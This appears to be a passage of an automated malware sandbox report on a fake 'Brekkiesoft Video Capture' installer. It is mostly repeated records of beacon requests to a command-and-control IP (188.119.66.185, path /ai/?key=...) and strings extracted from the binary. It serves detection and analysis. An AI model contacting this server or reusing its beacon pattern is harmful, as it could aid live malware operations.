                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_02C02B95 WSASetLastError,WSARecv,WSASetLastError,select,6_2_02C02B95
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficDNS traffic detected: DNS query: time.windows.com
                    Source: list.tmp, 00000002.00000002.2504041070.0000000005AEE000.00000004.00001000.00020000.00000000.sdmp, bsoftvideocapture33.exe, 00000006.00000000.1278473609.00000000004D4000.00000002.00000001.01000000.0000000A.sdmp, BrekkiesoftVideoCapture.exe.6.dr, bsoftvideocapture33.exe.2.dr, is-7DT4P.tmp.2.drString found in binary or memory: http://wonderwork.ucoz.com/
                    Source: svchost.exe, 00000003.00000002.1376008864.000001769B213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                    Source: list.tmp, list.tmp, 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-FUIGA.tmp.2.dr, list.tmp.0.drString found in binary or memory: http://www.innosetup.com/
                    Source: list.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
                    Source: list.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                    Source: list.exe, 00000000.00000003.1252614540.0000000002088000.00000004.00001000.00020000.00000000.sdmp, list.exe, 00000000.00000003.1252420844.0000000002380000.00000004.00001000.00020000.00000000.sdmp, list.tmp, list.tmp, 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-FUIGA.tmp.2.dr, list.tmp.0.drString found in binary or memory: http://www.remobjects.com/ps
                    Source: list.exe, 00000000.00000003.1252614540.0000000002088000.00000004.00001000.00020000.00000000.sdmp, list.exe, 00000000.00000003.1252420844.0000000002380000.00000004.00001000.00020000.00000000.sdmp, list.tmp, 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-FUIGA.tmp.2.dr, list.tmp.0.drString found in binary or memory: http://www.remobjects.com/psU
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2504737283.000000000336F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2501360979.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/&Du=
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2504737283.000000000336F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/)
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2504737283.000000000336F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/.
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2504737283.000000000336F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/5
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2504737283.0000000003358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/C
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2504737283.000000000336F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/J
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2501360979.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/MH
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2504737283.0000000003358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/N/
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2504737283.0000000003358000.00000004.00000020.00020000.00000000.sdmp, bsoftvideocapture33.exe, 00000006.00000002.2504737283.0000000003351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e3008889325
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2501360979.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/en-US
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2501360979.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/h5
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2504737283.0000000003358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ography
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2501360979.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/priseCertificates
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2504737283.0000000003358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/rosoft
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2504737283.000000000336F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/v
                    Source: svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                    Source: svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
                    Source: svchost.exe, 00000003.00000003.1375390941.000001769B26E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375634961.000001769B241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375470188.000001769B262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376073516.000001769B242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375597565.000001769B25A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376152284.000001769B270000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376125413.000001769B263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 00000003.00000003.1375390941.000001769B26E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376152284.000001769B270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                    Source: svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                    Source: svchost.exe, 00000003.00000002.1376138773.000001769B268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                    Source: svchost.exe, 00000003.00000002.1376167533.000001769B277000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375318633.000001769B275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                    Source: svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                    Source: svchost.exe, 00000003.00000002.1376048855.000001769B22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375470188.000001769B262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375597565.000001769B25A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376125413.000001769B263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                    Source: svchost.exe, 00000003.00000002.1376048855.000001769B22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375456752.000001769B267000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376138773.000001769B268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                    Source: svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                    Source: svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                    Source: svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                    Source: svchost.exe, 00000003.00000002.1376048855.000001769B22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375470188.000001769B262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376125413.000001769B263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                    Source: svchost.exe, 00000003.00000003.1375634961.000001769B241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376073516.000001769B242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                    Source: svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
